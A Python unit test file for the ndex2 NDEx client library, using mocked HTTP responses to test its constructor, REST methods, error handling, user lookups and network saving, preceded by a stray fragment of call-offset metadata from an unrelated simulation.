'(theta)\n', (21235, 21242), True, 'import numpy as np\n'), ((21245, 21262), 'numpy.abs', 'np.abs', (['force_mag'], {}), '(force_mag)\n', (21251, 21262), True, 'import numpy as np\n'), ((12733, 12779), 'copy.deepcopy', 'copy.deepcopy', (['closest_agent[0][1].state.p_pos'], {}), '(closest_agent[0][1].state.p_pos)\n', (12746, 12779), False, 'import copy\n'), ((12868, 12914), 'copy.deepcopy', 'copy.deepcopy', (['closest_agent[0][1].state.p_vel'], {}), '(closest_agent[0][1].state.p_vel)\n', (12881, 12914), False, 'import copy\n'), ((20508, 20546), 'numpy.arcsin', 'np.arcsin', (['(dist_past_end / entity.size)'], {}), '(dist_past_end / entity.size)\n', (20517, 20546), True, 'import numpy as np\n'), ((17631, 17669), 'numpy.random.randn', 'np.random.randn', (['*agent.action.c.shape'], {}), '(*agent.action.c.shape)\n', (17646, 17669), True, 'import numpy as np\n'), ((18807, 18827), 'numpy.square', 'np.square', (['delta_pos'], {}), '(delta_pos)\n', (18816, 18827), True, 'import numpy as np\n'), ((10851, 10883), 'copy.deepcopy', 'copy.deepcopy', (['agent.state.p_pos'], {}), '(agent.state.p_pos)\n', (10864, 10883), False, 'import copy\n'), ((10926, 10946), 'numpy.zeros', 'np.zeros', (['self.dim_p'], {}), '(self.dim_p)\n', (10934, 10946), True, 'import numpy as np\n'), ((12103, 12128), 'numpy.ones', 'np.ones', (['agent.color.size'], {}), '(agent.color.size)\n', (12110, 12128), True, 'import numpy as np\n'), ((13176, 13214), 'numpy.random.randn', 'np.random.randn', (['*agent.action.u.shape'], {}), '(*agent.action.u.shape)\n', (13191, 13214), True, 'import numpy as np\n'), ((16979, 17011), 'numpy.square', 'np.square', (['entity.state.p_vel[0]'], {}), '(entity.state.p_vel[0])\n', (16988, 17011), True, 'import numpy as np\n'), ((17014, 17046), 'numpy.square', 'np.square', (['entity.state.p_vel[1]'], {}), '(entity.state.p_vel[1])\n', (17023, 17046), True, 'import numpy as np\n'), ((20570, 20583), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (20576, 20583), True, 'import 
numpy as np\n'), ((10580, 10605), 'numpy.ones', 'np.ones', (['agent.color.size'], {}), '(agent.color.size)\n', (10587, 10605), True, 'import numpy as np\n'), ((17163, 17195), 'numpy.square', 'np.square', (['entity.state.p_vel[0]'], {}), '(entity.state.p_vel[0])\n', (17172, 17195), True, 'import numpy as np\n'), ((17264, 17296), 'numpy.square', 'np.square', (['entity.state.p_vel[1]'], {}), '(entity.state.p_vel[1])\n', (17273, 17296), True, 'import numpy as np\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `ndex2.client` package."""
import os
import sys
import io
import decimal
import unittest
import numpy as np
import json
import requests_mock
from unittest.mock import MagicMock
from requests.exceptions import HTTPError
from ndex2 import client
from ndex2.client import Ndex2
from ndex2.client import DecimalEncoder
from ndex2 import __version__
from ndex2.exceptions import NDExInvalidCXError
from ndex2.exceptions import NDExNotFoundError
from ndex2.exceptions import NDExUnauthorizedError
from ndex2.exceptions import NDExInvalidParameterError
from ndex2.exceptions import NDExUnsupportedCallError
from ndex2.exceptions import NDExError
# Message shown when these unit tests are skipped because an
# integration-test server/user is configured in the environment.
SKIP_REASON = 'NDEX2_TEST_USER environment variable detected, ' \
              'skipping for integration tests'
@unittest.skipIf(os.getenv('NDEX2_TEST_SERVER') is not None, SKIP_REASON)
class TestClient(unittest.TestCase):
def get_rest_admin_status_dict(self, version='2.1'):
return {"networkCount": 1321,
"userCount": 12,
"groupCount": 0,
"message": "Online",
"properties": {"ServerVersion": version,
"ServerResultLimit": "10000"}}
def get_rest_admin_v1_empty_dict(self):
return {}
def get_rest_admin_status_url(self):
return client.DEFAULT_SERVER + '/rest/admin/status'
    def setUp(self):
        """Set up test fixtures, if any."""
        # no shared fixtures: each test constructs its own requests_mock
        pass
    def tearDown(self):
        """Tear down test fixtures, if any."""
        # nothing to clean up
        pass
    def test_decimalencoder(self):
        """DecimalEncoder.default should coerce bytes, Decimal and numpy ints."""
        dec = DecimalEncoder()
        if sys.version_info.major >= 3:
            # test bytes is returned as string
            res = dec.default(bytes('hello', 'utf-8'))
            self.assertTrue(isinstance(res, str))
        # test decimal.Decimal is float
        res = dec.default(decimal.Decimal(5))
        self.assertTrue(isinstance(res, float))
        # test numpy.int64 is int
        res = dec.default(np.int64(12))
        self.assertTrue(isinstance(res, int))
        # test regular old int which throws TypeError
        try:
            res = dec.default(np.int32(1))
            self.assertEqual(res, int(1))
        except TypeError:
            pass
def test_ndex2_constructor_with_localhost(self):
# this is invasive, but there isn't really a good way
# to test the constructor
# try with nothing set
ndex = Ndex2(host='localhost')
self.assertEqual(ndex.debug, False)
self.assertEqual(ndex.version, 1.3)
self.assertEqual(ndex.status, {})
self.assertEqual(ndex.username, None)
self.assertEqual(ndex.password, None)
self.assertEqual(ndex.user_agent, '')
self.assertEqual(ndex.host, 'http://localhost:8080/ndexbio-rest')
self.assertTrue(ndex.s is not None)
self.assertTrue(ndex.timeout, 30)
ndex.set_request_timeout(10)
self.assertTrue(ndex.timeout, 30)
# try with user, pass and user_agent set oh and host
# with extra text prepended to localhost
ndex = Ndex2(host='xxxlocalhost', username='bob',
password='<PASSWORD>', user_agent='yo', debug=True,
timeout=1)
self.assertEqual(ndex.debug, True)
self.assertEqual(ndex.version, 1.3)
self.assertEqual(ndex.status, {})
self.assertEqual(ndex.username, 'bob')
self.assertEqual(ndex.password, '<PASSWORD>')
self.assertEqual(ndex.user_agent, ' yo')
self.assertEqual(ndex.host, 'http://localhost:8080/ndexbio-rest')
self.assertTrue(ndex.s is not None)
self.assertTrue(ndex.timeout, 1)
# try with user_agent set to None Issue #34
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2(user_agent=None)
self.assertEqual(ndex.user_agent, '')
    def test_ndex2_constructor_that_raises_httperror(self):
        """Status endpoint 404 -> client falls back to the v1 '/rest' API."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  text='uhoh',
                  reason='some error',
                  status_code=404)
            ndex = Ndex2()
            self.assertEqual(ndex.debug, False)
            self.assertEqual(ndex.version, '1.3')
            self.assertEqual(ndex.status, {})
            self.assertEqual(ndex.username, None)
            self.assertEqual(ndex.password, None)
            self.assertEqual(ndex.user_agent, '')
            self.assertEqual(ndex.host, client.DEFAULT_SERVER + '/rest')
            self.assertTrue(ndex.s is not None)
    def test_ndex2_constructor_with_defaulthost_serverversionnone(self):
        """ServerVersion of None -> treated as a v1 '/rest' server."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json={"networkCount": 1321,
                        "userCount": 12,
                        "groupCount": 0,
                        "message": "Online",
                        "properties": {"ServerVersion": None}})
            ndex = Ndex2()
            self.assertEqual(ndex.debug, False)
            self.assertEqual(ndex.version, '1.3')
            self.assertEqual(ndex.status, {})
            self.assertEqual(ndex.username, None)
            self.assertEqual(ndex.password, None)
            self.assertEqual(ndex.user_agent, '')
            self.assertEqual(ndex.host, client.DEFAULT_SERVER + '/rest')
            self.assertTrue(ndex.s is not None)
    def test_ndex2_constructor_with_defaulthost_properties_is_none(self):
        """Missing 'properties' key -> treated as a v1 '/rest' server."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json={"networkCount": 1321,
                        "userCount": 12,
                        "groupCount": 0,
                        "message": "Online"})
            ndex = Ndex2()
            self.assertEqual(ndex.debug, False)
            self.assertEqual(ndex.version, '1.3')
            self.assertEqual(ndex.status, {})
            self.assertEqual(ndex.username, None)
            self.assertEqual(ndex.password, None)
            self.assertEqual(ndex.user_agent, '')
            self.assertEqual(ndex.host, client.DEFAULT_SERVER + '/rest')
            self.assertTrue(ndex.s is not None)
    def test_ndex2_constructor_with_defaulthost_thatisversionone(self):
        """A 1.x ServerVersion must raise since only NDEx 2.x is supported."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json={"networkCount": 1321,
                        "userCount": 12,
                        "groupCount": 0,
                        "message": "Online",
                        "properties": {"ServerVersion": "1.1",
                                       "ServerResultLimit": "10000"}})
            try:
                Ndex2()
                self.fail('Expected exception')
            except Exception as e:
                self.assertEqual(str(e),
                                 'This release only supports NDEx 2.x server.')
    def test_ndex2_constructor_with_defaulthost_thatisversiontwo(self):
        """A 2.x ServerVersion -> client uses the '/v2' endpoint."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            self.assertEqual(ndex.debug, False)
            self.assertEqual(ndex.version, '2.1')
            self.assertEqual(ndex.status, {})
            self.assertEqual(ndex.username, None)
            self.assertEqual(ndex.password, None)
            self.assertEqual(ndex.user_agent, '')
            self.assertEqual(ndex.host, client.DEFAULT_SERVER + '/v2')
            self.assertTrue(ndex.s is not None)
    def test_ndex2_require_auth(self):
        """_require_auth raises when no credentials were supplied."""
        ndex = Ndex2(host='localhost')
        try:
            ndex._require_auth()
            self.fail('Expected exception')
        except Exception as e:
            self.assertEqual(str(e),
                             'This method requires user authentication')
    def test_ndex2_get_user_agent(self):
        """_get_user_agent appends the optional custom agent suffix."""
        ndex = Ndex2(host='localhost')
        # try with default
        res = ndex._get_user_agent()
        self.assertEqual(res, 'NDEx2-Python/' + __version__)
        ndex = Ndex2(host='localhost', user_agent='hi')
        # try with user_agent set
        res = ndex._get_user_agent()
        self.assertEqual(res, 'NDEx2-Python/' + __version__ + ' hi')
    def test_convert_exception_to_ndex_error(self):
        """_convert_exception_to_ndex_error wraps any exception as NDExError."""
        # try passing none
        ndex = Ndex2(host='localhost')
        try:
            ndex._convert_exception_to_ndex_error(None)
        except NDExError as ne:
            self.assertEqual('Caught unknown error', str(ne))
        # try passing in a ValueError
        try:
            ndex._convert_exception_to_ndex_error(ValueError('hi'))
        except NDExError as ne:
            self.assertEqual('Caught ValueError: hi', str(ne))
    def test_convert_requests_http_error_to_ndex_error(self):
        """HTTPError with 404 maps to NDExNotFoundError, others to NDExError."""
        # try passing none
        ndex = Ndex2(host='localhost')
        try:
            ndex._convert_requests_http_error_to_ndex_error(None)
        except NDExError as ne:
            self.assertEqual('Caught unknown server error', str(ne))
        error = MagicMock()
        error.response = MagicMock()
        error.response.status_code = 404
        error.response.text = 'hi'
        # try passing in a mock HTTPError
        try:
            ndex._convert_requests_http_error_to_ndex_error(error)
            self.fail('Expected NDExNotFoundError')
        except NDExNotFoundError as ne:
            self.assertEqual('Caught 404 from server: hi', str(ne))
        # try passing in a 500 error
        error.response.status_code = 500
        try:
            ndex._convert_requests_http_error_to_ndex_error(error)
            self.fail('Expected NDExError')
        except NDExError as ne:
            self.assertEqual('Caught 500 from server: hi', str(ne))
    def test_ndex2_put_no_json_empty_resp_code_204(self):
        """PUT returning 204 No Content yields an empty string."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.put(client.DEFAULT_SERVER + '/v2/hi', status_code=204)
            ndex = Ndex2()
            res = ndex.put('/hi')
            self.assertEqual(res, '')
    def test_ndex2_put_no_json_empty_code_200(self):
        """PUT returning 200 with a non-JSON body yields the raw text."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.put(client.DEFAULT_SERVER + '/v2/hi',
                  status_code=200,
                  text='hehe',
                  request_headers={'Content-Type': 'application/'
                                                   'json;charset=UTF-8',
                                   'Accept': 'application/json',
                                   'User-Agent': client.userAgent},
                  headers={'Content-Type': 'application/foo'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.put('/hi')
            self.assertEqual(res, 'hehe')
    def test_ndex2_put_returns_code_401(self):
        """PUT returning 401 Unauthorized raises HTTPError."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.put(client.DEFAULT_SERVER + '/v2/hi',
                  status_code=401,
                  text='hehe',
                  request_headers={'Content-Type': 'application/'
                                                   'json;charset=UTF-8',
                                   'Accept': 'application/json',
                                   'User-Agent': client.userAgent},
                  headers={'Content-Type': 'application/foo'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            try:
                ndex.put('/hi')
                self.fail('Expected HTTPError')
            except HTTPError as he:
                self.assertEqual(he.response.status_code, 401)
                self.assertEqual(he.response.text, 'hehe')
    def test_ndex2_put_returns_code_500(self):
        """PUT returning 500 Server Error raises HTTPError."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.put(client.DEFAULT_SERVER + '/v2/hi',
                  status_code=500,
                  text='hehe',
                  request_headers={'Content-Type': 'application/'
                                                   'json;charset=UTF-8',
                                   'Accept': 'application/json',
                                   'User-Agent': client.userAgent},
                  headers={'Content-Type': 'application/foo'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            try:
                ndex.put('/hi')
                self.fail('Expected HTTPError')
            except HTTPError as he:
                self.assertEqual(he.response.status_code, 500)
                self.assertEqual(he.response.text, 'hehe')
    def test_ndex2_put_with_json_and_json_resp(self):
        """PUT with a JSON body parses and returns a JSON response."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.put(client.DEFAULT_SERVER + '/v2/hi',
                  status_code=200,
                  json={'hi': 'bye'},
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.put('/hi', put_json='{"x": "y"}')
            self.assertEqual(res, {'hi': 'bye'})
    def test_ndex2_post_with_json_and_json_resp(self):
        """POST with a JSON body parses and returns a JSON response."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER + '/v2/hi',
                   status_code=200,
                   json={'hi': 'bye'},
                   headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.post('/hi', post_json='{"x": "y"}')
            self.assertEqual(res, {'hi': 'bye'})
    def test_ndex2_delete_with_json_and_json_resp(self):
        """DELETE with a data payload parses and returns a JSON response."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.delete(client.DEFAULT_SERVER + '/v2/hi',
                     status_code=200,
                     json={'hi': 'bye'},
                     headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.delete('/hi', data='{"x": "y"}')
            self.assertEqual(res, {'hi': 'bye'})
    def test_ndex2_delete_no_data(self):
        """DELETE without a payload still returns the JSON response."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.delete(client.DEFAULT_SERVER + '/v2/hi',
                     status_code=200,
                     json={'hi': 'bye'},
                     headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.delete('/hi')
            self.assertEqual(res, {'hi': 'bye'})
    def test_ndex2_get_with_json_and_json_resp(self):
        """GET with query parameters parses and returns a JSON response."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(client.DEFAULT_SERVER + '/v2/hi?x=y',
                  status_code=200,
                  json={'hi': 'bye'},
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get('/hi', get_params={"x": "y"})
            self.assertEqual(res, {'hi': 'bye'})
    def test_ndex2_get_stream_withparams(self):
        """get_stream returns the raw streaming response object."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(client.DEFAULT_SERVER + '/v2/hi?x=y',
                  status_code=200,
                  json={'hi': 'bye'},
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.get_stream('/hi', get_params={"x": "y"})
            self.assertEqual(res.json(), {'hi': 'bye'})
            self.assertEqual(res.status_code, 200)
    def test_ndex2_post_stream_withparams(self):
        """post_stream sends Connection: close and returns the response."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER + '/v2/hi',
                   status_code=200,
                   json={'hi': 'bye'},
                   request_headers={'Connection': 'close'},
                   headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.post_stream('/hi', post_json={"x": "y"})
            self.assertEqual(res.json(), {'hi': 'bye'})
            self.assertEqual(res.status_code, 200)
    def test_ndex2_put_multipart(self):
        """put_multipart sends form fields and yields '' on success."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.put(client.DEFAULT_SERVER + '/v2/hi',
                  request_headers={'Connection': 'close'},
                  status_code=200)
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.put_multipart('/hi', fields={"x": "y"})
            self.assertEqual(res, '')
    def test_ndex2_post_multipart(self):
        """post_multipart sends form fields and yields '' on success."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER + '/v2/hi',
                   request_headers={'Connection': 'close'},
                   status_code=200)
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.post_multipart('/hi', fields={"x": "y"})
            self.assertEqual(res, '')
    def test_ndex2_post_multipart_with_querystring(self):
        """post_multipart appends the optional query string to the URL."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER + '/v2/hi?yo=1',
                   request_headers={'Connection': 'close'},
                   status_code=200)
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            res = ndex.post_multipart('/hi', {"x": "y"}, query_string='yo=1')
            self.assertEqual(res, '')
    def test_get_id_for_user_invalid_param(self):
        """get_id_for_user validates the username argument."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            # try where None passed in and client was
            # also constructed with anonymous connection so
            # no username
            try:
                ndex.get_id_for_user(None)
                self.fail('Expected NDExInvalidParameterError')
            except NDExInvalidParameterError as ne:
                self.assertTrue('None passed in this method' in str(ne))
            # try where username is not of type str
            try:
                ndex.get_id_for_user(44)
                self.fail('Expected NDExInvalidParameterError')
            except NDExInvalidParameterError as ne:
                self.assertEqual('Username must be of type str', str(ne))
            # try where username is empty str
            try:
                ndex.get_id_for_user('')
                self.fail('Expected NDExInvalidParameterError')
            except NDExInvalidParameterError as ne:
                self.assertEqual('Username cannot be empty str', str(ne))
    def test_get_user_by_username(self):
        """get_user_by_username returns the user record from the server."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/user?username=bob'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(resurl, json={'userName': 'bob'},
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            res = ndex.get_user_by_username('bob')
            self.assertEqual('bob', res['userName'])
    def test_get_id_for_user_success(self):
        """get_id_for_user returns the externalId of the user record."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/user?username=bob'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(resurl, json={'externalId': '12345'},
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            self.assertEqual('12345', ndex.get_id_for_user('bob'))
    def test_get_id_for_user_httperror(self):
        """Server 404 surfaces as NDExNotFoundError."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/user?username=bob'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(resurl,
                  status_code=404,
                  text='error',
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            try:
                ndex.get_id_for_user('bob')
                self.fail('Expected NDExNotFoundError')
            except NDExNotFoundError as ne:
                self.assertEqual('Caught 404 from server: error',
                                 str(ne))
    def test_get_id_for_user_exception(self):
        """An unparseable (empty) response surfaces as NDExError."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/user?username=bob'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(resurl,
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            try:
                ndex.get_id_for_user('bob')
                self.fail('Expected NDExError')
            except NDExError as ne:
                self.assertTrue('Caught JSONDecodeError:' in str(ne))
def test_get_id_for_user_no_external_id(self):
with requests_mock.mock() as m:
resurl = client.DEFAULT_SERVER + '/v2/user?username=bob'
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(resurl,
json={'uhoh': 'missing'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
try:
ndex.get_id_for_user('bob')
self.fail('Expected NDExError')
except NDExError as ne:
self.assertTrue('Unable to get user id for user: bob',
str(ne))
    def test_get_user_by_id_invalid_user_id(self):
        """get_user_by_id validates the user_id argument."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            # try passing None
            try:
                ndex.get_user_by_id(None)
                self.fail('Expect NDExInvalidParameterError')
            except NDExInvalidParameterError as ne:
                self.assertEqual('user_id must be a str', str(ne))
            # try passing empty string
            try:
                ndex.get_user_by_id('')
                self.fail('Expect NDExInvalidParameterError')
            except NDExInvalidParameterError as ne:
                self.assertEqual('user_id cannot be an empty str', str(ne))
    def test_get_user_by_id_success(self):
        """get_user_by_id returns the user record from the server."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/user/foo'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(resurl,
                  json={'userName': 'foo'},
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            res = ndex.get_user_by_id('foo')
            self.assertEqual('foo', res['userName'])
    def test_get_user_by_id_404_error(self):
        """Server 404 surfaces as NDExNotFoundError."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/user/foo'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(resurl,
                  text='some error', status_code=404)
            ndex = Ndex2()
            try:
                res = ndex.get_user_by_id('foo')
                self.fail('Expected NDExNotFoundError: ' + str(res))
            except NDExNotFoundError as ne:
                self.assertEqual('Caught 404 from server: some error',
                                 str(ne))
    def test_get_user_by_id_500_error(self):
        """Server 500 surfaces as a generic NDExError."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/user/foo'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(resurl,
                  text='error', status_code=500)
            ndex = Ndex2()
            try:
                res = ndex.get_user_by_id('foo')
                self.fail('Expected NDExNotFoundError: ' + str(res))
            except NDExError as ne:
                self.assertEqual('Caught 500 from server: error',
                                 str(ne))
    def test_get_user_by_id_random_exception(self):
        """An unparseable (empty) response surfaces as NDExError."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/user/foo'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(resurl,
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            try:
                res = ndex.get_user_by_id('foo')
                self.fail('Expected NDExError: ' + str(res))
            except NDExError as ne:
                self.assertTrue('Caught JSONDecodeError' in str(ne))
    def test_get_networksets_for_user_invalid_userid(self):
        """get_networksets_for_user_id rejects a non-str user_id."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            # try where user id is None
            try:
                ndex.get_networksets_for_user_id(None)
                self.fail('Expected NDExInvalidParameterError')
            except NDExInvalidParameterError as ne:
                self.assertEqual('user_id must be of type str',
                                 str(ne))
            # try where user id is not of type str
            try:
                ndex.get_networksets_for_user_id(4)
                self.fail('Expected NDExInvalidParameterError')
            except NDExInvalidParameterError as ne:
                self.assertEqual('user_id must be of type str',
                                 str(ne))
    def test_get_networksets_for_user_invalid_limit(self):
        """A non-int limit is rejected."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            # try where limit is not int or str
            try:
                ndex.get_networksets_for_user_id('foo', limit=3.5)
                self.fail('Expected NDExInvalidParameterError')
            except NDExInvalidParameterError as ne:
                self.assertTrue('limit parameter must be of type '
                                'int ' in str(ne))
    def test_get_networksets_for_user_invalid_offset_type(self):
        """A non-int offset is rejected."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            # try where limit is not int or str
            try:
                ndex.get_networksets_for_user_id('foo', offset=3.5)
                self.fail('Expected NDExInvalidParameterError')
            except NDExInvalidParameterError as ne:
                self.assertTrue('offset parameter must be of type '
                                'int ' in str(ne))
    def test_get_networksets_for_user_invalid_offset(self):
        """A positive offset requires a positive limit."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            # try where limit is not int or str
            try:
                ndex.get_networksets_for_user_id('foo', offset=5)
                self.fail('Expected NDExInvalidParameterError')
            except NDExInvalidParameterError as ne:
                self.assertTrue('limit (0) parameter must be set to '
                                'positive ' in str(ne))
    def test_get_networksets_for_user_success(self):
        """Valid parameters return the server's networksets payload."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/user/foo/networksets'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(resurl, json={'hi': 'there'},
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            res = ndex.get_networksets_for_user_id('foo',
                                                   summary_only=False,
                                                   showcase=True)
            self.assertEqual('there', res['hi'])
    def test_get_networksets_for_user_httperror(self):
        """Server 404 surfaces as NDExNotFoundError."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/user/foo/networksets'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(resurl, status_code=404)
            ndex = Ndex2()
            try:
                ndex.get_networksets_for_user_id('foo')
            except NDExNotFoundError as ne:
                self.assertEqual('Caught 404 from server: ', str(ne))
    def test_get_networksets_for_user_exception(self):
        """An unparseable (empty) response surfaces as NDExError."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/user/foo/networksets'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(resurl,
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2()
            try:
                ndex.get_networksets_for_user_id('foo')
            except NDExError as ne:
                self.assertTrue('Caught JSONDecodeError: ' in str(ne))
    def test_save_new_network_none_as_cx(self):
        """Verify save_new_network() raises NDExInvalidCXError when CX
        is None."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            try:
                ndex.save_new_network(None)
                self.fail('expected NDExInvalidCXError')
            except NDExInvalidCXError as ice:
                self.assertEqual(str(ice), 'CX is None')
    def test_save_new_network_invalid_as_cx(self):
        """Verify save_new_network() raises NDExInvalidCXError when CX
        is not a list."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            try:
                ndex.save_new_network('hi')
                self.fail('expected NDExInvalidCXError')
            except NDExInvalidCXError as ice:
                self.assertEqual(str(ice), 'CX is not a list')
    def test_save_new_network_empty_cx(self):
        """Verify save_new_network() raises NDExInvalidCXError when CX
        is an empty list."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            try:
                ndex.save_new_network([])
                self.fail('expected NDExInvalidCXError')
            except NDExInvalidCXError as ice:
                self.assertEqual(str(ice), 'CX appears to be empty')
    def test_save_new_network_cx_with_no_status(self):
        """Verify save_new_network() posts multipart CX to the NDEx v2
        endpoint and appends a status aspect when the CX lacks one."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/v2/network/asdf'
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.post(client.DEFAULT_SERVER + '/v2/network',
                   request_headers={'Connection': 'close'},
                   status_code=1,
                   text=resurl)
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            res = ndex.save_new_network([{'foo': '123'}])
            self.assertEqual(res, resurl)
            # inspect the raw multipart body that was posted
            decode_txt = m.last_request.text.read().decode('UTF-8')
            self.assertTrue('Content-Disposition: form-data; '
                            'name="CXNetworkStream"; '
                            'filename="filename"' in decode_txt)
            self.assertTrue('Content-Type: application/'
                            'octet-stream' in decode_txt)
            self.assertTrue('{"foo": "123"}' in decode_txt)
            # status aspect should have been added automatically
            self.assertTrue('{"status": [{"' in decode_txt)
            self.assertTrue('"error": ""' in decode_txt)
            self.assertTrue('"success": true' in decode_txt)
    def test_save_new_network_cx_with_no_status_ndexv1(self):
        """Same as the v2 no-status test, but against a server whose
        status endpoint reports no version (legacy /rest API)."""
        with requests_mock.mock() as m:
            resurl = client.DEFAULT_SERVER + '/rest/network/asdf'
